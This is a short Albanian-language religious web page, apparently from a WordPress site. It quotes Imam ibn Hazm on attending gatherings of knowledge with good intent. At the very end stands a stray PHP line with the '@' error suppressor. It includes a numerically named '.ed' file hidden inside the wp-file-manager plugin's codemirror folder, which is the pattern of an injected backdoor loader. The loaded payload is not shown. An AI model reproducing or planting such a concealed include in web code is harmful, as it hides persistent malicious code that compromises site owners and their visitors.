Sexta-feira, 12/4/2024 | : : UTC+0
Mjeksia Islame
United States
+11C

Kur te prezantosh nje tubim dije

Kur te prezantosh nje tubim dije

Imam ibn Hazmi (Allahu e meshirofte) thote: “Kur te prezantosh nje tubim dije, le te jete prezenca jote per te perfituar njohuri dhe shperblime dhe jo per tu vetemjaftuar me ate qe ke, apo per te gjetur nje te mete qe ta perhapesh. Keto jane veprimet e njerezve te ulet, te cilet nuk do te kene kurre sukses ne marrjen e dijes. Nese prezenca jote behet me qellim te mire, atehere do te perfitosh ne cdo aspekt. Ne te kunderten (nese ke qellim tjeter), qendrimi yt ne shtepi eshte me clodhes per trupin me i ndershem per moralin dhe me i paster sa i takon fese tende.” [El Ahlaku ue Sijeru].

@include "wp-content/plugins/wp-file-manager/lib/codemirror/mode/eiffel/include/7260.ed";